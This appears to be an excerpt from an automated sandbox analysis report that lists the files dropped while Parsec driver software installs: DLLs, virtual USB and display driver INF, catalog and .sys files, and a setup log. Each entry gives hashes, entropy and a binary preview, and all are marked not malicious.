                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):78336
                            Entropy (8bit):6.371751508872591
                            Encrypted:false
                            SSDEEP:1536:UbDMdx4Tm9lSD2HAcOqa57xlYuNxo8b1E:+MduTm9lSD7rNKk6
                            MD5:0D5F0A7CA2A8A47E3A26FB1CB67E118C
                            SHA1:CD2F50FD5A7BD6291DE1948F100415044C767E63
                            SHA-256:3C928B9AFF2E651AA35EA798C29FDE398E9F7817E3451AE0F4C97C86630DC92B
                            SHA-512:84398D4E5680C2EA1679D0076468207A9503B053A233932FD3EFAEFDBF4559CFEAB5A0E95F526644C6382A88C17B6A62D3993323012211AB685DA4C4B025C045
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./.`k..3k..3k..3b.f3E..3...2j..3...2j..3...2...3k..3..3...2h..3...2H..3...3j..3...2j..3Richk..3........PE..L.....RR.....................6....................@..........................p......".....@...... ...........................!.......@..P....................P......P(..T............................................ ...............................text............................... ..`.data...............................@....idata....... ......................@..@.didat.......0......................@....rsrc...P....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\ws2help.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):4096
                            Entropy (8bit):4.139121993350808
                            Encrypted:false
                            SSDEEP:48:yZ/5Q4Ja0Y+0IeaRiCn5yXHUhQqSA6AqzrtEIZWXoXuV25WwHg:ohJr0IeQ5yXuQhrmEWYQmWw
                            MD5:E32319E5947A76F8E50EC50C37906882
                            SHA1:135A1ED2ADD1E8DDFF0920DF82E57078CA3CBD06
                            SHA-256:2A900AC21B85E6E32A502F24B804D8796A0D148B513D449AB4384323846D7DA9
                            SHA-512:5DEFF824DC784CDD44AE7C76B53EB9D212D1D9D2199F23D766325A2702180963BF52C40C6CC095C1F1584B2918DC9A7F4EEA7320904CAD147B48CD0A7F7584C0
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........=..S...S...S...S...S......S...Q...S.Rich..S.........PE..L.................!..............................8N.........................0......z.....@E........................`...0............ .. ...............................T............................................................................text...<...........................@..@.rsrc... .... ......................@..@...............$..........................d..........................$..................................x.......................H...............>...i...............@...z...........=...v...............5...p...............I...x...............)...Z...............*...]..........."..._...............!...P...............2...g...................................................WS2HELP.dll.WahCloseApcHelper.ws2_32.WahCloseApcHelper.WahCloseHandleHelper.ws2_32.WahCloseHandleHelper.WahClose

                            C:\Users\user\AppData\Roaming\PSecWin\wups.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):37376
                            Entropy (8bit):5.313827090823637
                            Encrypted:false
                            SSDEEP:768:hpT8dTrLIdc5DGhZgItQwWgGjG1al2YjZ/2:hpAdTrLIdc5DGhZgItTXGcaLjZ/2
                            MD5:2422934B02194D962E3891D91DFF50C8
                            SHA1:7E00DF40C44ABC1077424CAF084494507FFF726F
                            SHA-256:313B1EB5A6DE86E234FCB18A6AA4AE75FFECB9243BDEC7F34253A7FCC9F29FC0
                            SHA-512:6E1F4C7CFA87A4576A5F943AF5B84B9BEADE8FFEA36CB94A03461F338C36C6647D074DBA4B5E160D75018762E5448A193FE59E0D2662DC6FCD24FEDAB45AC256
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........sP.n...n...n.......n.......n.......n...n...n.......n.......n.......n.......n.......n..Rich.n..........PE..L...[..............!.....n...$.......m...............................................M....@A........................P{......D........................................0..T...........................(...................@............................text....l.......n.................. ..`.data...H............r..............@....idata...............t..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\xpsservices.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):1831424
                            Entropy (8bit):6.562960863651942
                            Encrypted:false
                            SSDEEP:49152:wORUHXxYF3icgea4Zb8nlJq22qT1MTrQyEDAxq4:FR+XxYxhgvc2Dq22gmrNi
                            MD5:61393B3920D949B7A89D8D8623A65BD8
                            SHA1:539EF7897C1A642BAA9353E3B630D35DFC642F5F
                            SHA-256:C70DA787D2857BB08A49327CE75299B6440A75E70BEABC8EFDC4084B779454CE
                            SHA-512:870AD9D39053A6A833A8ECD6F94691CD68839A4C47444D46EDEE0544D58C581D6D1CB821F181F2F9CFAB45C4AECA60CDF8D0D62128E6481319B81724DC4B048D
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......'_.]c>..c>..c>..jF..W>..wU..g>..wU..w>..c>...>..wU..j>..wU..W>..wU..b>..wU...>..wU~.b>..wU..b>..Richc>..........................PE..L...g.i...........!.....Z...........`.......p...............................@......._....@A.........................i..................P........................c...Y..T...................l{.......z.......................h..@....................text....Y.......Z.................. ..`.data........p.......^..............@....idata..p............r..............@..@.didat..............................@....rsrc...P...........................@..@.reloc...c.......d..................@..B................................................................................................................................................................................................................................................................

                            C:\Users\user\AppData\Roaming\PSecWin\xwreg.dll (copy)

                            Download File
                            Process:C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmp
                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Category:dropped
                            Size (bytes):98816
                            Entropy (8bit):6.316378030753595
                            Encrypted:false
                            SSDEEP:3072:Q7Gh7ckvMmmAhgZhaHydiPuC0Z7corN/RBPe:Q7Ehg/aHcXCG7corBK
                            MD5:652C03D08A2ABB6ADC51F081B4FA078E
                            SHA1:C75D8762FBF44E97AF4B6C8B68E18977B35264E9
                            SHA-256:33ECC20387B077231AA28A3F13A33FAF030721360E74FD551D71BD26FC30E424
                            SHA-512:3EABA26C7D9B1A58CCD1AF0361E273DC2827D1CF2147A7889642CB3D93071885F7A83DFCD1555CF5C5694E8B61CC7BD9D52270024820050CCD1E5223758301C6
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$................................................................................j............Rich............PE..L....T.............!.....(...Z......p........@......................................5.....@A........................P6..h...$R..........8 ...........................@..T............................................P.. ...`5.......................text....&.......(.................. ..`.data........@.......,..............@....idata.......P.......6..............@..@.didat.......p.......H..............@....rsrc...8 ......."...J..............@..@.reloc...............l..............@..B................................................................................................................................................................................................................................................................................

                            C:\Windows\INF\c_display.PNF

                            Download File
                            Process:C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
                            File Type:Windows Precompiled iNF, version 3.3 (Windows 10), flags 0x1000083, unicoded, has strings, at 0x15b8 "Signature", at 0x68 WinDirPath, LanguageID 809, at 0x80 language en-GB
                            Category:dropped
                            Size (bytes):8660
                            Entropy (8bit):3.3733007089209863
                            Encrypted:false
                            SSDEEP:96:66BcwTdCMNyLNfWdlapY4VfOrtlBARv7Li+XT7+uZt/Y0BnuOTITdE7VGpR2bQjN:67wQMYBfeaOBA9LjXvZ1NnuT6u
                            MD5:A35E461187397BC21D7B1FFBC425EB69
                            SHA1:1F8AF576F211C42C237324A7C04D5BE9DA89C39C
                            SHA-256:0474A97D51D62B4FE7BCBAEFBDE58C25590C088CC25C93735126F98039C2C0D5
                            SHA-512:1F37125FBBDB18D5088409AA083840C9EEFF4B9318466E7B6B2F54245FBB6FB24497E31369A7A112BD0B7FF8592E4B0551CF3F30EA7D99F969B2CB135BF13CD4
                            Malicious:false
                            Preview:..........................x................$...............H...................h................!......C.:.\.W.i.n.d.o.w.s.....e.n.-.G.B...........................................................D...................................................................................................h...........................0...........|...........<...........t.......(.......................$...................................................................................................................................................................p...........P............................... .......................................|...|...........................................................|...........,...............................................................................................................................................$...................p...................@...................................................................................................

                            C:\Windows\INF\oem4.inf

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                            C:\Windows\INF\oem5.inf

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                            C:\Windows\INF\setupapi.dev.log

                            Download File
                            Process:C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
                            File Type:Generic INItialization configuration [BeginLog]
                            Category:dropped
                            Size (bytes):86018
                            Entropy (8bit):5.1296240215603115
                            Encrypted:false
                            SSDEEP:768:Own95cdyYloiwTyz25Lns3aG0arPonyc4pny8:O+5cdyeoiwGeLns3aG0arPyyc4dy8
                            MD5:7823D862F0462754BF8F4FC141C10138
                            SHA1:BEB78B8026146E6EE750DA3E1705FAB3AD11B80B
                            SHA-256:2B7D2710BC63B489A8DEEA6456907B372EABFC94B4E13A771DC0F34EE1F95E6F
                            SHA-512:5BEDCE1023046EEF291F05E39C66E20B1CD407C566445C92BFB195CCB42B329CCBDC6166A041DB4EC05715D4B5544CA28153691F5871DF6110858DF9ADC057EF
                            Malicious:false
                            Preview:[Device Install Log].. OS Version = 10.0.19045.. Service Pack = 0.0.. Suite = 0x0100.. ProductType = 1.. Architecture = amd64....[BeginLog]....[Boot Session: 2023/10/03 09:57:02.288]....>>> [Setup Import Driver Package - C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf]..>>> Section start 2023/10/03 09:57:37.904.. cmd: C:\Windows\System32\spoolsv.exe.. inf: Provider: Microsoft.. inf: Class GUID: {4D36E979-E325-11CE-BFC1-08002BE10318}.. inf: Driver Version: 06/21/2006,10.0.19041.1806.. inf: Catalog File: prnms009.cat.. ump: Import flags: 0x0000000D.. pol: {Driver package policy check} 09:57:37.920.. pol: {Driver package policy check - exit(0x00000000)} 09:57:37.920.. sto: {Stage Driver Package: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf: {Query Configurability: C:\Windows\system32\spool\tools\Microsoft Print To PDF\prnms009.Inf} 09:57:37.920.. inf:

                            C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET636D.tmp

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                            C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET637D.tmp

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                            C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\SET638E.tmp

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                            C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.cat (copy)

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):12001
                            Entropy (8bit):7.346082125667387
                            Encrypted:false
                            SSDEEP:192:0SWbYOAJCanEwKUNhYCaKJ8RwX01k9z3AmSSk:dGUNh31J9R9zvSSk
                            MD5:CFE9C8FD6FAF915A653D39895D3D0862
                            SHA1:9DAA9CAE1DB02C898EB193A47C838B834B295D01
                            SHA-256:F37FEBB98B96E9E39135ACCE723186952363C4C5BF2341C4ABE486D8580415EF
                            SHA-512:F7894C8FC7726DC0F9A9392A4607324EC52D6B7C0BDA775901741FC0CA5C13522160B67D82D690A850EC9ECC911D3C8BE31E0080A7CEFE48B5694F7EFEF75421
                            Malicious:false
                            Preview:0.....*.H..........0......1.0...`.H.e......0.....+.....7......0...0...+.....7......1.....D..G..Yc...240306184122Z0...+.....7.....0..p0.... .......~..ed.R3R.....g...w.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... .......~..ed.R3R.....g...w.....0....S.1W.]...4 o...0R9d1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...s.y.s...0.... T....?..}..!rL".......0.{;.~..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b.a...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... T....?..}..!rL".......0.{;.~..0...../;..'%.+d`.fn..>..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0B..+.....7...1402...F.i.l.e....... p.a.r.s.e.c.v.u.s.b

                            C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.inf (copy)

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):3005
                            Entropy (8bit):5.435819624452916
                            Encrypted:false
                            SSDEEP:48:NhWiES6lNFCodG3NDLei7kNGZxYPZ5yL0dWe1mbBXohY25k/nMxON6wDNvn9XkI5:KioCoQ9DLei7kNGvYPZ5yL0dWUmZoxkH
                            MD5:04F8C6A4C9D90818704596FFF273AD0E
                            SHA1:F82F3B99ED2725EB2B64608D666EAF983EDE9288
                            SHA-256:54ED129DC73FB7D9A37D899E21724C22F69FE8F8BC99CAAD30197B3B107EF90B
                            SHA-512:B26D5110C459B9B51DB371387FB11AC4109019ABF085A762CB953EDCCBD34E95E6B48D9813A92218FA9AFD87AFA14057172FB1D0236E58C1ACFB13FDC3EF7501
                            Malicious:false
                            Preview:;..; parsecvusba.inf..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36fc9e60-c465-11cf-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvusba.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[DestinationDirs]..DefaultDestDir = 12..parsecvusba_Device_CoInstaller_CopyFiles = 11......[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvusba.sys = 1,,..;.....;*****************************************..; Install Section..;*****************************************....[Manufacturer]..%ManufacturerName%=Standard,NTamd64....[Standard.NTamd64]..%parsecvusba.DeviceDesc%=parsecvusba_Device, Root\Parsec\VUSBA....[parsecvusba_Device.NT]..CopyFiles=Drivers_Dir....[parsecvusba_Device.NT.hw]..AddReg=parsecvusba_Device_AddReg....; Add persisted slots key skeleton under device key..[parsecvusba_Device_AddReg]..HKR,"PersistedSlots","RestoreOnStartup",0x00010003,1..HKR,"PersistedSlots\01\ControlEndpoint",,0x00000010,..HKR,"PersistedSlots\02\Control

                            C:\Windows\System32\DriverStore\Temp\{18245a7a-9319-bd4f-bd5f-a24ba1e93bca}\parsecvusba.sys (copy)

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:PE32+ executable (native) x86-64, for MS Windows
                            Category:dropped
                            Size (bytes):263336
                            Entropy (8bit):6.416646624342821
                            Encrypted:false
                            SSDEEP:3072:xRE2rWFQ6X4P1n4rjzwpj1KCUBnN295ehsH6oGfyo55BRkGU8qwwdyk0mwvF6Vqu:7xPBSXwND+N2SEo55UVw3k0OhRD
                            MD5:591AB089C7184E33D0F4DB12B4CA5498
                            SHA1:8F45CFC643564BB1D69B6A5059C2403542AFA0F3
                            SHA-256:8FDC89A3BA70B279827B4A29B4ED22A59373FC9304DE4CCD06FD3428BFF4B0F1
                            SHA-512:D8A662EEE3D466C0A44718C4E14B1D4F65310BF84D484C7362423970C57C0DC604ECC3D5A5BCC09AD9E328E3BF1402A50D8A7414CA4EF634D8FB618CE18FC286
                            Malicious:false
                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ON.../w../w../w.@Wp../w..W../w.f.r../w.@Wv../w../v.N/w.@Wq../w../w../w.@Wt../w.@Ws../w.@Wr../w.f.s../w.f..../w.f.u../w.Rich./w.........PE..d...k..e.........."....&.h...t......p..........@.............................0.......R....`A....................................................x............P...........(... ......p...8...........................0...@............................................text...2........................... ..h.rdata..x:.......<..................@..H.data........0......................@....pdata.......P.......*..............@..HPAGED........p.......H.............. ..`PAGE.....w.......x...T.............. ..`INIT................................ ..b.rsrc...............................@..B.reloc....... ......................@..B................................................................................................................

                            C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70CA.tmp

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11858
                            Entropy (8bit):7.334407083811773
                            Encrypted:false
                            SSDEEP:192:1zQ2L1BJCdnEwKUNhYCxTBm+0U8X01k9z3AGTObrQ:1PlUNh3xTBmo8R9zNKo
                            MD5:560EFA3FA6E5AB486D958B12207AC6ED
                            SHA1:69B8EBE8AE3D9AF94886DC1C9C52FC858B5AFFAB
                            SHA-256:16DB056748CAEB3B2D6ABBF9F6C77F34DD0F81D3BBF4E65DA2EE4F2FD0B55681
                            SHA-512:A4761740090CDBA84CDA9E9A805C695567B6ED5C79AB339DA315679124B7C9F05CC0B2DE53DFB58D133CE67F30F5DDE5A20C2F2A1330C9C8F4A85ABDD674456F
                            Malicious:false
                            Preview:0..N..*.H.........?0..;...1.0...`.H.e......0.....+.....7.....r0..n0...+.....7......i.h..!M.K6..kB...240306184122Z0...+.....7.....0...0.....oX0o ...Vg...$.-. .1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0.... 'Fd....#...m0cJ..0.........d..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... 'Fd....#...m0cJ..0.........d..0..........U..,...\.#.s..1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0.... ...."..3..6F......$rY..T....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0J..+.....7...1<0:...F.i.l.e.......(p.a.r.s.e.c.v.i.r.t.u.a.l.d.s...i.n.f...0U..+.....7...1G0E0...+.....7.......010...

                            C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70DB.tmp

                            Download File
                            Process:C:\Windows\System32\drvinst.exe
                            File Type:Windows setup INFormation
                            Category:dropped
                            Size (bytes):1311
                            Entropy (8bit):5.255673591625164
                            Encrypted:false
                            SSDEEP:24:fWHjKOUPiE492k6StyO8rKd8tYxrCddcdg1xOjLtxlDxXL6qVt5poZQxWx00:092iEu2kmO/wYxefc61xOjLtxRxWq35y
                            MD5:AC423F3B285C615E7BEC73DC2FA71D20
                            SHA1:A508A10AD7DE55F0EC2CE9C4135CE623B773BF1D
                            SHA-256:E31AEFF7229AD9B63394FB3646F7DFDDE2EA8BBE8B247259A5A9548FE3CD89E3
                            SHA-512:FF2ECBA42697815F906D4E5501F9C4B33CD5652432DFB26302644AD385B40E361C32E0120603002D93DC12B0C38E081D5FF0CCE6145A0420BA0EE70A22FE3B07
                            Malicious:false
                            Preview:;..; Parsec Virtual DS USB filter driver for fixing UDE compatibility with USBAUDIO.SYS..;....[Version]..Signature="$WINDOWS NT$"..Class=USB..ClassGuid={36FC9E60-C465-11CF-8056-444553540000}..Provider=%ManufacturerName%..CatalogFile=parsecvirtualds.cat..DriverVer = 03/06/2024,0.2.8.0..PnpLockdown=1....[SourceDisksNames]..1 = %DiskName%,,,""....[SourceDisksFiles]..parsecvirtualds.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..parsecvirtualds.DriverFiles = 12....[DefaultInstall.NTamd64]..OptionDesc = %parsecvirtualdsServiceDesc%..CopyFiles = parsecvirtualds.DriverFiles....[DefaultUninstall.NTamd64]..LegacyUninstall = 1....[parsecvirtualds.DriverFiles]..parsecvirtualds.sys....[DefaultInstall.NTamd64.Services]..AddService = %parsecvirtualdsServiceName%,,parsecvirtualds.Service....[parsecvirtualds.Service]..DisplayName = %parsecvirtualdsServiceName%..Description = %parsecvirtualdsServiceDesc%..ServiceBinary = %12%\parsecvirtualds.sys..ServiceType = 1 ; SERVICE_KERNEL_DRI

                            C:\Windows\System32\DriverStore\Temp\{7106dfa1-62ec-4647-bfd5-42198dd8ac12}\SET70EC.tmp

